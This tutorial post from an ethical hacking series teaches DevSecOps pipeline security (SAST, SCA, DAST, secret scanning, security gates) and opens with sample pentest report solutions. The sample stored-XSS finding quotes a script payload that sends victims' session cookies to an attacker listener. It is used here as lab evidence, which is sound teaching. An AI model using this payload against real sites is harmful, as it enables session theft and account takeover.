Learn Ethical Hacking (#67) - Continuous Security - DevSecOps and Pipeline Security

@scipio 70

about 10 hours ago

What will I learn

What DevSecOps means and why "shift left" is more than a buzzword;
Security in CI/CD pipelines -- integrating SAST, DAST, SCA, and secret scanning into builds;
SAST (Static Application Security Testing) -- finding vulnerabilities in source code before deployment;
DAST (Dynamic Application Security Testing) -- testing running applications for vulnerabilities;
SCA (Software Composition Analysis) -- tracking and scanning third-party dependencies;
Infrastructure scanning -- tfsec, Checkov, and kube-bench in the deployment pipeline;
Security gates -- when to block deployments and when to alert;
Defense: building a security-aware development culture, not a security bottleneck.

Requirements

A working modern computer running macOS, Windows or Ubuntu;
Familiarity with CI/CD concepts (GitHub Actions, GitLab CI, or Jenkins);
Understanding of IaC security from Episode 38;
The ambition to learn ethical hacking and security research.

Difficulty

Intermediate

Curriculum (of the `Learn Ethical Hacking Series`):

Learn Ethical Hacking (#67) - Continuous Security - DevSecOps and Pipeline Security

Solutions to Episode 66 Exercises

Exercise 1: Full finding write-up (abbreviated).

Title: Stored XSS in User Profile Display Name
Severity: High (CVSS 7.6 -- AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N)
Affected: https://dvwa.lab/vulnerabilities/xss_s/

Description: The user profile "Name" field does not sanitize
HTML/JavaScript input. A stored XSS payload persists in the
database and executes in any user's browser that views the profile.

Business Impact: An attacker can steal session cookies of any
user (including administrators) who views the attacker's profile,
enabling full account takeover.

Evidence: [screenshot of Burp request with payload
  <script>document.location='http://10.10.14.5/steal?c='+document.cookie</script>
  and screenshot of cookie received on attacker's netcat listener]

Reproduction: 1. Log in as low-privilege user. 2. Navigate to
profile settings. 3. Enter XSS payload in Name field. 4. Save.
5. Log in as admin and view the user's profile. 6. Admin session
cookie is sent to attacker's listener.

Remediation: HTML-encode all user input on output. Implement
Content-Security-Policy header with script-src 'self'.

The reproduction steps are the part most people get lazy about. Notice that every step is concrete and sequential -- a junior developer who has never heard of XSS can follow steps 1-6 and see exactly what happens. No "test the input field for XSS" hand-waving. The CVSS string encodes the full attack vector, and the business impact section does what we discussed in episode 66: translates the technical finding into consequences that a non-technical stakeholder actually cares about. The remediation section is specific to the technology (HTML encoding on output, not "fix the vulnerability"), and it includes a defense-in-depth layer (CSP header) in case the primary fix has gaps.
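To make the "CVSS string encodes the full attack vector" point tangible, here is a minimal sketch of how the 7.6 in the write-up falls out of the vector. It assumes the CVSS v3.1 base-score equations and metric weights as published by FIRST; the function names (base_score, roundup) are my own and not part of any library.

```python
import math

# CVSS v3.1 base-metric weights (taken from the FIRST specification).
WEIGHTS = {
    "AV": {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2},
    "AC": {"L": 0.77, "H": 0.44},
    "UI": {"N": 0.85, "R": 0.62},
    "C": {"H": 0.56, "L": 0.22, "N": 0.0},
    "I": {"H": 0.56, "L": 0.22, "N": 0.0},
    "A": {"H": 0.56, "L": 0.22, "N": 0.0},
}
# Privileges Required is weighted differently when Scope is Changed.
PR_WEIGHTS = {
    "U": {"N": 0.85, "L": 0.62, "H": 0.27},
    "C": {"N": 0.85, "L": 0.68, "H": 0.5},
}


def roundup(value):
    """Round up to one decimal place the way the v3.1 spec defines it."""
    scaled = int(round(value * 100000))
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score(vector):
    """Compute the base score for a vector like 'AV:N/AC:L/PR:L/...'."""
    m = dict(part.split(":") for part in vector.split("/"))
    scope = m["S"]
    iss = 1 - (
        (1 - WEIGHTS["C"][m["C"]])
        * (1 - WEIGHTS["I"][m["I"]])
        * (1 - WEIGHTS["A"][m["A"]])
    )
    if scope == "U":
        impact = 6.42 * iss
    else:
        impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15
    exploitability = (
        8.22
        * WEIGHTS["AV"][m["AV"]]
        * WEIGHTS["AC"][m["AC"]]
        * PR_WEIGHTS[scope][m["PR"]]
        * WEIGHTS["UI"][m["UI"]]
    )
    if impact <= 0:
        return 0.0
    total = impact + exploitability
    if scope == "C":
        total *= 1.08
    return roundup(min(total, 10))


print(base_score("AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N"))  # 7.6
```

Change a single metric (say UI:R to UI:N) and the score moves, which is why the vector string belongs in the finding next to the number.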

Exercise 2: Executive summary (abbreviated).

During the assessment of Apex Financial's customer portal
(May 12-16, 2026), our team identified 18 security vulnerabilities
including 2 Critical-severity issues that allow complete compromise
of the application and its underlying database.

An external attacker with no credentials can extract the full
customer database (estimated 200,000 records) and gain
administrative access to the server infrastructure. This represents
significant regulatory risk under GDPR and PCI DSS.

Overall Risk Rating: CRITICAL

Top 3 Recommendations:
1. Immediately patch the SQL injection in the login form (2-4 hours)
2. Implement multi-factor authentication for all user accounts
3. Engage a remediation sprint to address the 5 High-severity
   findings within 30 days

The key quality marker of this summary: almost zero jargon. No "POST endpoint," no "parameterized queries," no CVSS vectors. The one technical term, "SQL injection," appears only in the recommendations, where the people doing the patching need to know what to fix. The executive reads "an external attacker with no credentials can extract the full customer database" and understands the risk immediately. The recommendations include time estimates (which help the manager prioritize) and specific next steps (which prevent the summary from sitting in someone's inbox forever). If a non-technical board member reads this and cannot explain the risk in their own words, the summary needs rewriting -- as we discussed in episode 66, the executive summary is the most important section because it is the ONLY section most decision-makers will read.

Exercise 3: Ghostwriter setup and comparison (abbreviated).

Ghostwriter setup: Docker Compose on Ubuntu, 3 containers
  (Django app, PostgreSQL, Nginx). Initial setup: 15 minutes.
  Created project "Lab Pentest Q2 2026", added 3 findings from
  DVWA lab work (SQLi, stored XSS, broken auth).

Report generation: selected findings, chose PDF template,
  exported. Total time from blank project to finished PDF: 45 min.

Markdown + Pandoc comparison:
  Wrote same 3 findings in Markdown, ran pandoc with --toc.
  Total time: 35 minutes (faster for 3 findings).

BUT: Ghostwriter's finding library is the differentiator.
  After entering those 3 findings once, the NEXT engagement
  starts with pre-written SQLi/XSS/auth findings that only
  need endpoint-specific details filled in. By engagement #5,
  report creation time drops to ~20 minutes because 80% of
  common findings are already in the library.

Verdict: Markdown wins for solo operators doing <5 engagements/year.
  Ghostwriter wins for teams or anyone doing 10+ engagements --
  the finding library compounds in value over time.

This comparison highlights exactly the point from episode 66 about reporting tools: the value of a finding library is not visible on the first engagement. It only becomes clear after you have written the same "Blind SQL Injection" finding for the fifth time and realize that Ghostwriter lets you fill in the endpoint-specific details in 2 minutes instead of writing 3 paragraphs from scratch. The Markdown + Pandoc approach is simpler, faster to set up, and gives you full control -- but it does not scale across engagements because every report starts from zero. For the solo bug bounty hunter writing occasional reports, Pandoc is fine. For a pentest firm running multiple concurrent engagements, Ghostwriter (or PlexTrac, or Serpico) is not optional.

Episode 66 was about reporting and documentation -- the skill that separates pentesters who get hired once from pentesters who get hired back. We covered report structure (executive summary, methodology, findings, risk summary, appendices), the art of writing findings that actually drive remediation (CVSS scoring, business impact language, specific reproduction steps, actionable remediation), evidence standards, the multi-audience problem (executives want risk, managers want priorities, engineers want fix instructions), reporting tools (Ghostwriter, PlexTrac, Serpico, Markdown + Pandoc), and common mistakes that make reports useless. The closing argument was that individual pentest findings fix individual bugs, but trend analysis across engagements reveals the systemic weaknesses that organizations need to address at the process level.

Today we take that insight about systemic improvement and make it concrete. If the pentest report keeps finding SQL injection year after year, the problem is not the individual SQL injection -- it is the development process that allows SQL injection to reach production in the first place. The fix is not "patch this query." The fix is "make it impossible for this class of bug to survive the build pipeline." That is DevSecOps, and it is the subject of today's episode.

Shift Left -- What It Actually Means

Traditional security testing happens at the end. Build the application, deploy it to staging, hire a pentester, get the report, panic, fix things, deploy again. This is like building a house, moving in, and THEN checking if the foundation is cracked. If you find a critical issue, you tear down the house and start over. Expensive, slow, and frustrating for everyone involved.

Shift left means moving security testing earlier in the development lifecycle -- to the left on the typical development timeline diagram. Find the SQL injection during the code review, not during the annual pentest. Detect the hardcoded AWS credential in the pull request, not in the breach notification. Catch the vulnerable Log4j dependency at build time, not after the attacker has already used it to install a cryptominer on your production servers.

I want to be clear about what shift left is NOT: it is NOT replacing pentesting. It is ensuring that when the pentester finally arrives, they spend their time finding architectural flaws, business logic bugs, and complex attack chains -- the things that require human creativity and cannot be automated. If your pentester is spending three days finding SQL injections that a $0 open-source scanner would have caught in 30 seconds, you are wasting their time and your money. DevSecOps handles the commodity vulnerabilities automatically, so the humans can focus on the hard problems ;-)

The economics are brutal. Widely cited industry figures (usually attributed to IBM-sponsored research, and best read as orders of magnitude rather than precise measurements) put the cost of fixing a bug found in development at roughly $80. The same bug found in testing costs $240. Found in production? $960. Found during a breach? Tens of thousands, sometimes millions. Shifting left is not just a security philosophy -- it is a financial argument that even the most budget-conscious CTO cannot ignore.

The DevSecOps Pipeline

Here is what a modern security-integrated pipeline looks like. Every stage adds a layer of automated security checking, and the code only reaches production if it survives all of them:

Developer writes code
       |
[PRE-COMMIT] -- Secret scanning (gitleaks, git-secrets)
       |
[CODE REVIEW] -- Peer review + security checklist
       |
[CI BUILD]
  |-- SAST (Semgrep, CodeQL) -- scan source code
  |-- SCA (Snyk, Dependabot, pip-audit) -- scan dependencies
  |-- IaC scan (tfsec, Checkov) -- scan Terraform/K8s manifests
  |-- Container scan (Trivy) -- scan Docker images
  |-- Secret scan (trufflehog) -- scan repo history
       |
[STAGING DEPLOY]
       |
[DAST] -- ZAP, Nuclei -- scan running application
       |
[SECURITY GATE] -- pass/fail based on findings
       |
[PRODUCTION DEPLOY]
       |
[CONTINUOUS MONITORING] -- runtime security, vulnerability alerts

Each layer catches a different class of problem. Pre-commit hooks prevent developers from accidentally committing API keys and database passwords (we covered leaked secrets on GitHub in episode 65 -- those leaks happen because there was no pre-commit guard). SAST catches code-level vulnerabilities like SQL injection and XSS patterns before anyone runs the code. SCA catches known-vulnerable dependencies -- the Log4Shell situation (episode 45 on supply chain attacks) would have been caught by any SCA tool that knew about CVE-2021-44228. DAST catches runtime issues that static analysis misses -- misconfigurations, missing security headers, authentication bypasses that only manifest when the application is actually running.

The critical insight is that no single layer catches everything. SAST finds SQL injection patterns in source code but cannot detect authentication logic flaws that only appear at runtime. DAST finds runtime issues but cannot tell you which line of code to fix. SCA knows about published CVEs but knows nothing about your custom code. The layers complement each other, and the combination provides coverage that none of them achieves alone.

SAST -- Finding Bugs in Source Code

SAST tools analyze your source code without executing it. They look for patterns that match known vulnerability types -- string concatenation in SQL queries (SQL injection), unsanitized user input rendered in HTML (XSS), use of deprecated cryptographic functions (weak crypto), hardcoded credentials, and hundreds more.

# GitHub Actions: Semgrep SAST scan
name: Security Scan
on: [push, pull_request]

jobs:
  sast:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
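      - name: Semgrep Scan
        # semgrep-action is deprecated upstream; newer setups run `semgrep ci`
        # inside the semgrep/semgrep container image instead
        uses: returntocorp/semgrep-action@v1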
        with:
          config: >-
            p/security-audit
            p/owasp-top-ten
            p/python

That is about 15 lines of YAML to get automated vulnerability scanning on every push and every pull request. Fifteen lines. There is genuinely no excuse for not having this in every repository that touches the internet.

# Semgrep command-line usage (local development)
semgrep --config "p/owasp-top-ten" --config "p/security-audit" ./src/

# Example findings:
# src/auth.py:47 -- sql-injection
#   cursor.execute(f"SELECT * FROM users WHERE name='{name}'")
#   Fix: use parameterized query
#
# src/views.py:123 -- xss
#   return HttpResponse(f"<h1>Welcome {username}</h1>")
#   Fix: use Django template engine with auto-escaping

# CodeQL (GitHub's SAST engine)
# Configured via .github/codeql/codeql-config.yml
# Runs automatically on GitHub repos with Advanced Security enabled
# Deeper data-flow analysis than Semgrep but slower (minutes vs seconds)
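The "use parameterized query" fix from the example findings can be sketched as follows. This is a minimal illustration using Python's built-in sqlite3 module with an in-memory database; the table layout and the function names find_user_unsafe / find_user_safe are made up for the demo.

```python
import sqlite3


def find_user_unsafe(conn, name):
    # Vulnerable: user input is interpolated into the SQL text itself.
    query = f"SELECT id, name FROM users WHERE name='{name}'"
    return conn.execute(query).fetchall()


def find_user_safe(conn, name):
    # Parameterized: the driver passes `name` as data, never as SQL.
    query = "SELECT id, name FROM users WHERE name = ?"
    return conn.execute(query, (name,)).fetchall()


# Throwaway in-memory database (hypothetical schema for this demo).
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
conn.executemany("INSERT INTO users (name) VALUES (?)", [("alice",), ("bob",)])

payload = "x' OR '1'='1"
print(find_user_unsafe(conn, payload))  # every row comes back
print(find_user_safe(conn, payload))    # no rows: payload is treated as a name
```

The placeholder syntax differs per driver (? for sqlite3, %s for psycopg2 and MySQL drivers), but the principle is identical: the query text never contains user input.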

SAST tools comparison:

Semgrep:    fast, pattern-based, great custom rules, open-source
CodeQL:     deep data-flow analysis, GitHub-integrated, query language
Bandit:     Python-specific, simple, good for quick checks
SonarQube:  comprehensive, multi-language, dashboard-focused
Checkmarx:  enterprise, commercial, very thorough but expensive

Start with: Semgrep for immediate value (free, fast, good defaults)
Add CodeQL if on GitHub (free for public repos, included in GHAS)

Semgrep deserves special attention because it has fundamentally changed the SAST landscape. Traditional SAST tools (Checkmarx, Fortify, Veracode) are expensive, slow, and produce enormous numbers of false positives. Semgrep is open-source, runs in seconds (not hours), and its pattern-matching approach means the rules are readable -- you can look at a Semgrep rule and understand exactly what it is searching for. The community-maintained rulesets (p/owasp-top-ten, p/security-audit) cover the most common vulnerability patterns across Python, JavaScript, Java, Go, Ruby, and more. You can also write custom rules specific to your codebase in about 10 minutes -- if your application has a custom execute_query() function that should always use parameterized inputs, you write a Semgrep rule that flags any call to execute_query() with string concatenation.
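To show what "pattern-based" means in practice, here is a rough sketch of the execute_query() check written against Python's own ast module. This is NOT how Semgrep is implemented and not Semgrep rule syntax; it is a stand-in that illustrates the idea of matching a syntactic shape. The function name find_unsafe_execute_query and the sample snippet are assumptions for the demo.

```python
import ast


def find_unsafe_execute_query(source, func_name="execute_query"):
    """Return line numbers where func_name() gets a dynamically built string."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        callee = node.func
        # Handle both execute_query(...) and obj.execute_query(...).
        if isinstance(callee, ast.Name):
            name = callee.id
        else:
            name = getattr(callee, "attr", None)
        if name != func_name or not node.args:
            continue
        first = node.args[0]
        # f-string with at least one interpolated value
        is_fstring = isinstance(first, ast.JoinedStr) and any(
            isinstance(v, ast.FormattedValue) for v in first.values
        )
        # "..." + var  or  "..." % var
        is_concat = isinstance(first, ast.BinOp) and isinstance(
            first.op, (ast.Add, ast.Mod)
        )
        if is_fstring or is_concat:
            findings.append(node.lineno)
    return sorted(findings)


SAMPLE = '''\
execute_query(f"SELECT * FROM users WHERE name='{name}'")
execute_query("SELECT * FROM users WHERE id = " + user_id)
execute_query("SELECT * FROM users WHERE id = %s", (user_id,))
db.execute_query("DELETE FROM t WHERE id = %s" % user_id)
'''

print(find_unsafe_execute_query(SAMPLE))  # [1, 2, 4]
```

Line 3 passes because the query text is a constant and the value travels separately as a parameter. A real Semgrep rule expresses the same shape declaratively, which is what makes the rules readable.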

CodeQL goes deeper. Where Semgrep matches syntactic patterns (it sees f"SELECT * FROM ... {var}" and flags it), CodeQL performs data-flow analysis -- it traces where user input enters the application (a "source") and where it reaches a dangerous function (a "sink"), even across multiple function calls and file boundaries. This means CodeQL catches vulnerabilities that Semgrep misses: cases where user input passes through three helper functions before reaching the SQL query, or where a configuration value loaded from a user-controlled file eventually ends up in an os.system() call. The tradeoff is speed -- CodeQL builds a full semantic database of your codebase and queries it, which takes minutes rather than seconds.
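The source-to-sink idea can be illustrated with a deliberately tiny taint tracker. This is a toy under heavy assumptions (top-level statements only, straight-line code, any expression that mentions a tainted name counts as tainted) and has nothing to do with CodeQL's actual engine or query language; the SOURCES and SINKS tables are hypothetical.

```python
import ast

SOURCES = {(None, "input")}   # hypothetical: calls returning attacker-controlled data
SINKS = {("os", "system")}    # hypothetical: dangerous (module, function) pairs


def _call_name(call):
    """Return (module, function) for calls like f(...) or mod.f(...)."""
    func = call.func
    if isinstance(func, ast.Name):
        return (None, func.id)
    if isinstance(func, ast.Attribute) and isinstance(func.value, ast.Name):
        return (func.value.id, func.attr)
    return (None, None)


def is_tainted(expr, tainted):
    """True if expr mentions a tainted variable or calls a source."""
    for node in ast.walk(expr):
        if isinstance(node, ast.Name) and node.id in tainted:
            return True
        if isinstance(node, ast.Call) and _call_name(node) in SOURCES:
            return True
    return False


def find_flows(source):
    """Return line numbers of sink calls that receive tainted data."""
    tainted, findings = set(), []
    for stmt in ast.parse(source).body:  # top-level statements, in order
        if isinstance(stmt, ast.Assign):
            names = [t.id for t in stmt.targets if isinstance(t, ast.Name)]
            if is_tainted(stmt.value, tainted):
                tainted.update(names)
            else:
                tainted.difference_update(names)  # overwritten with clean data
        elif isinstance(stmt, ast.Expr) and isinstance(stmt.value, ast.Call):
            call = stmt.value
            if _call_name(call) in SINKS and any(
                is_tainted(arg, tainted) for arg in call.args
            ):
                findings.append(stmt.lineno)
    return findings


SAMPLE = "\n".join([
    "import os",
    "name = input()",
    "cleaned = normalize(name)",
    "cmd = 'ls ' + cleaned",
    "os.system(cmd)",
    "os.system('ls /tmp')",
])

print(find_flows(SAMPLE))  # [5]
```

Notice that line 5 contains no f-string and no user input in sight; a purely syntactic rule looking at that line alone has little to go on. Tracking the value from input() through normalize() and the concatenation is what flags it.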

Having said that, SAST tools have a fundamental limitation: they cannot understand business logic. A SAST scanner will never tell you "this discount calculation can be manipulated by adding items and removing them in a specific order" (episode 22, business logic flaws). They find code-level patterns, not application-level reasoning. This is why SAST complements pentesting rather than replacing it.

SCA -- Scanning Dependencies

Your application is 10% your code and 90% other people's code. Those dependencies have vulnerabilities too, and new CVEs are published daily. SCA tools track your dependencies and alert you when a known vulnerability affects one of them.

# GitHub Actions: dependency scanning
jobs:
  sca:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4

      # Python
      - name: pip-audit
        run: pip install pip-audit && pip-audit -r requirements.txt --format json

      # Node.js
      - name: npm audit
        run: npm audit --json

      # Container images
      - name: Trivy
        # pin to a release tag or commit SHA in real pipelines; @master is a moving target
        uses: aquasecurity/trivy-action@master
        with:
          image-ref: 'myapp:latest'
          severity: 'CRITICAL,HIGH'
          exit-code: '1'  # fail the build on critical/high findings

# Manual SCA scanning

# Python
pip-audit
# Found 3 vulnerabilities (output abbreviated):
#   requests 2.25.0 -- CVE-2023-32681 (High)
#   urllib3 1.26.5 -- CVE-2023-43804 (Medium)

# Node.js
npm audit
# 2 critical, 5 high, 12 moderate vulnerabilities

# Go
govulncheck ./...

# Container image scanning
trivy image myapp:latest
# Total: 147 (CRITICAL: 3, HIGH: 12, MEDIUM: 45, LOW: 87)

The container scanning numbers are worth talking about. 147 vulnerabilities in a single Docker image sounds terrifying, but context matters. Most of those are in base OS packages that your application never calls -- a vulnerable version of libxml2 in the Ubuntu base image is only exploitable if your application actually parses untrusted XML using the system library. The CRITICAL and HIGH findings are what you act on immediately (and those 15 findings typically include things like OpenSSL vulnerabilities that DO affect your application's TLS handling).

The real power of SCA is continuous monitoring. GitHub's Dependabot, Snyk, and similar tools do not just scan once -- they monitor your dependency tree continuously and open pull requests automatically when a new CVE is published that affects one of your dependencies. This matters because vulnerabilities are disclosed on a schedule that has nothing to do with YOUR release cycle. A critical OpenSSL CVE published on a Tuesday afternoon needs to be addressed whether or not you had a sprint planned. Automated dependency PRs mean your team sees the vulnerability, the fix, and the test results in one place, and can merge the update in minutes instead of spending hours researching which dependency version to bump.

Remember episode 45 on supply chain attacks? SCA is the primary defense against the exact attack vectors we discussed there. A typosquatted npm package, a compromised PyPI dependency, a backdoored GitHub Action -- SCA tools maintain databases of known malicious packages and will flag them before they reach your production environment. Not perfect (zero-day supply chain attacks bypass SCA by definition), but it catches the vast majority of known threats.
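At its core, an SCA check is a join between "what versions do I have pinned" and "which versions are known-vulnerable". A minimal sketch, assuming exact == pins with plain numeric versions and a hand-written advisory table standing in for a real vulnerability database (the ADVISORIES dict and the function names are illustrative, not pip-audit's internals):

```python
def parse_version(text):
    """'2.25.0' -> (2, 25, 0). Plain numeric versions only in this sketch."""
    return tuple(int(part) for part in text.split("."))


def parse_requirements(text):
    """Extract exact pins (name==version) from requirements.txt content."""
    pins = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()  # drop comments
        if "==" not in line:
            continue  # this sketch ignores ranges and unpinned entries
        name, version = line.split("==", 1)
        pins[name.strip().lower()] = parse_version(version.strip())
    return pins


# Hand-written stand-in for an advisory database: package -> [(id, first fixed version)].
# The single entry reflects the requests example used in this episode.
ADVISORIES = {
    "requests": [("CVE-2023-32681", (2, 31, 0))],
}


def audit(requirements_text, advisories=ADVISORIES):
    """Return (package, advisory_id) pairs for pins older than the fixed version."""
    findings = []
    for name, version in parse_requirements(requirements_text).items():
        for advisory_id, fixed_in in advisories.get(name, []):
            if version < fixed_in:
                findings.append((name, advisory_id))
    return findings


print(audit("requests==2.25.0\nflask==3.0.0\n"))
```

Real tools also resolve transitive dependencies and handle version ranges, pre-releases, and environment markers, which is exactly why you use pip-audit instead of twenty lines of Python.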

DAST -- Testing Running Applications

SAST looks at code. DAST looks at the running application from the outside -- exactly like a pentester would, but automated. It sends HTTP requests, analyzes responses, and identifies vulnerabilities that only manifest at runtime.

# GitHub Actions: ZAP DAST scan against staging
jobs:
  dast:
    runs-on: ubuntu-latest
    steps:
      - name: ZAP Baseline Scan
        uses: zaproxy/action-baseline@<pinned-version>  # pin to a current release tag
        with:
          target: 'https://staging.myapp.com'
          rules_file_name: '.zap/rules.tsv'
          cmd_options: '-a'

      - name: Nuclei Scan
        run: |
          nuclei -u https://staging.myapp.com \
            -t cves/ -t vulnerabilities/ \
            -severity critical,high \
            -o nuclei-results.txt

SAST vs DAST -- when to use each:

SAST (white-box): sees the source code
  Pro: finds bugs early, specific file + line number
  Con: false positives, cannot find runtime configuration issues
  Finds: SQLi patterns, XSS sinks, hardcoded secrets

DAST (black-box): tests the running application
  Pro: finds real exploitable vulnerabilities (low false positive rate)
  Con: late in the pipeline, cannot pinpoint code location
  Finds: SQLi (confirms exploitable), XSS (confirms in browser),
         missing headers, misconfigurations, auth bypass

Use BOTH. SAST catches 80% of code bugs early and cheap.
DAST catches the 20% that SAST misses -- runtime config issues,
logic flaws that only appear when components interact, and
chained vulnerabilities that static analysis cannot model.

The SAST vs DAST distinction maps directly to the testing philosophy we discussed across multiple episodes. SAST is like reading the blueprint of a lock (you can spot design flaws). DAST is like actually trying to pick the lock (you discover whether it opens). A SQL injection pattern in source code is a SAST finding -- it looks vulnerable. The same SQL injection confirmed exploitable by an automated ZAP scan is a DAST finding -- it IS vulnerable. Both are valuable, at different stages of the pipeline.

ZAP (Zed Attack Proxy) is the most widely used open-source DAST tool. It spiders the application to discover all endpoints, then runs active scan rules against each one -- testing for SQL injection, XSS, directory traversal, insecure headers, and dozens of other vulnerability classes. The "baseline scan" mode (used in the GitHub Actions example above) is the lightweight version: it checks for passive issues (missing security headers, cookie flags, information disclosure) without sending active attack payloads. The full scan sends actual attack payloads and takes longer but finds more. For a CI/CD pipeline, the baseline scan on every PR and the full scan on a weekly schedule is a reasonable balance between thoroughness and speed.
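The passive checks of a baseline scan boil down to inspecting responses without attacking anything. A rough sketch of two such checks, assuming the response headers are already available as a plain dict; the header list and function names are my own choice for illustration, not ZAP's rule set:

```python
# Headers a passive check typically expects on an HTML response (illustrative list).
EXPECTED_HEADERS = (
    "Content-Security-Policy",
    "Strict-Transport-Security",
    "X-Content-Type-Options",
    "X-Frame-Options",
)


def missing_security_headers(response_headers):
    """Return expected security headers absent from the response (case-insensitive)."""
    present = {name.lower() for name in response_headers}
    return [h for h in EXPECTED_HEADERS if h.lower() not in present]


def cookie_flag_issues(set_cookie_value):
    """Return which of Secure / HttpOnly are missing from one Set-Cookie value."""
    attributes = {
        part.strip().split("=", 1)[0].lower()
        for part in set_cookie_value.split(";")[1:]  # skip the name=value pair
    }
    return [flag for flag in ("Secure", "HttpOnly") if flag.lower() not in attributes]


headers = {"content-security-policy": "default-src 'self'", "Server": "nginx"}
print(missing_security_headers(headers))
print(cookie_flag_issues("session=abc123; Path=/; HttpOnly"))
```

Nothing here sends a payload, which is why this class of check is safe to run on every PR. The active scan is a different beast and belongs on a schedule against a disposable staging environment.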

Nuclei complements ZAP by running template-based checks -- thousands of community-contributed templates that test for specific CVEs, known misconfigurations, default credentials, exposed admin panels, and technology-specific vulnerabilities. Where ZAP is a generic web vulnerability scanner, Nuclei is more like "run 5,000 specific checks that the community has written templates for." The combination of ZAP (broad coverage) and Nuclei (specific checks) provides comprehensive DAST coverage.

Security Gates -- The Hard Decision

This is where DevSecOps gets political. You have automated tools finding vulnerabilities. The question is: what do you DO with the findings?

The hardest DevSecOps decision: when do you BLOCK a deployment?

Aggressive gates (high security, slow velocity):
  Block on: any Critical or High finding
  Result: developers fix everything before deploying
  Risk: teams circumvent gates, frustration, shadow deployments

Permissive gates (low security, fast velocity):
  Block on: nothing (alert only)
  Result: fast deployments, vulnerabilities reach production
  Risk: breaches, compliance failures, audit findings

Balanced approach (recommended):
  BLOCK on:
  - Critical SAST findings (SQLi, RCE, hardcoded secrets)
  - Critical SCA findings (known exploited vulnerabilities)
  - Failed secret scanning (credentials in code)

  ALERT on (but do not block):
  - High/Medium SAST findings
  - High SCA findings without known exploits
  - DAST findings (require human investigation)

  IGNORE:
  - Informational findings
  - Low-severity SCA (no known exploit, theoretical risk)

The goal: block the things that DEFINITELY cause breaches.
Alert on the things that MIGHT cause breaches.
Ignore the noise.

The balanced approach works because it respects the development team's velocity while drawing hard lines around the vulnerabilities that actually get exploited in the real world. A hardcoded AWS key in source code (blocked) is qualitatively different from a Medium-severity information disclosure header (alerted). One leads to account compromise within hours of pushing to a public repo. The other is a best-practice issue that should be fixed but does not justify stopping a deployment.

The biggest mistake organizations make with security gates is starting aggressive and then giving up. They block every PR on any finding, developers spend 40% of their time fighting false positives and overriding gates, frustration builds, and eventually someone with admin access disables the gates entirely "until we sort this out" (which means forever). The balanced approach avoids this death spiral by only blocking on findings that EVERYONE agrees should never reach production. Once the team trusts the gates (because the gates are not crying wolf every other commit), you can gradually tighten the thresholds.
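The balanced policy is simple enough to write down as code, which is also the best way to make it auditable. A minimal sketch, assuming findings have already been normalized into a common shape; the Finding fields, the tool labels, and the fallback ("anything the policy does not mention becomes an alert") are my assumptions, not the output format of any particular scanner:

```python
from dataclasses import dataclass


@dataclass
class Finding:
    tool: str                      # "sast", "sca", "dast", or "secrets"
    severity: str                  # "critical", "high", "medium", "low", "info"
    known_exploited: bool = False  # e.g. listed as exploited in the wild


def gate_decision(finding):
    """Map one finding to 'block', 'alert', or 'ignore' per the balanced policy."""
    if finding.tool == "secrets":
        return "block"             # credentials in code always block
    if finding.severity == "info":
        return "ignore"
    if finding.tool == "dast":
        return "alert"             # needs human investigation
    if finding.tool == "sast":
        return "block" if finding.severity == "critical" else "alert"
    if finding.tool == "sca":
        if finding.severity == "critical" or finding.known_exploited:
            return "block"
        if finding.severity == "low":
            return "ignore"
        return "alert"
    return "alert"                 # assumption: unknown tools default to alert


def pipeline_passes(findings):
    """The deployment proceeds only if no finding maps to 'block'."""
    return all(gate_decision(f) != "block" for f in findings)


findings = [
    Finding("sast", "medium"),
    Finding("sca", "high"),
    Finding("dast", "high"),
]
print(pipeline_passes(findings))                                  # True
print(pipeline_passes(findings + [Finding("secrets", "high")]))   # False
```

Keeping the policy in a reviewed file like this means tightening a threshold later is a pull request with a visible diff, not a checkbox somebody flipped in a dashboard.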

Putting It All Together -- A Complete Pipeline

# Complete GitHub Actions security pipeline
name: Security Pipeline
on:
  push:
    branches: [main]
  pull_request:
    branches: [main]

jobs:
  secrets:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with: { fetch-depth: 0 }
      - name: Secret Scan
        uses: trufflesecurity/trufflehog@main
        with:
          extra_args: --only-verified

  sast:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: returntocorp/semgrep-action@v1
        with:
          config: p/security-audit p/owasp-top-ten

  sca:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: pip install pip-audit && pip-audit -r requirements.txt
      - uses: aquasecurity/trivy-action@master
        with:
          scan-type: 'fs'
          severity: 'CRITICAL,HIGH'
          exit-code: '1'

  iac:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: tfsec
        uses: aquasecurity/tfsec-action@<pinned-version>  # pin to a current release tag

Notice that all four jobs run in parallel. The secrets, sast, sca, and iac jobs have no dependencies on each other, so GitHub Actions runs them concurrently. A pipeline that runs four security scans in 90 seconds (parallel) instead of 6 minutes (sequential) is a pipeline that developers do not complain about. Speed matters -- not because security is less important than velocity, but because a slow pipeline that developers bypass is worse than a fast pipeline that actually runs on every commit.

The trufflehog --only-verified flag deserves attention. Trufflehog scans git history for strings that look like secrets (API keys, tokens, passwords). Without --only-verified, it reports everything that LOOKS like a secret, which includes base64-encoded test data, UUIDs, and random strings that are not actually credentials. With --only-verified, it attempts to verify each potential secret against the corresponding service (AWS, GitHub, Slack, etc.) and only reports the ones that are actually valid and active. This dramatically reduces false positives -- you go from "50 potential secrets" to "3 verified active credentials" which is a much more actionable result.

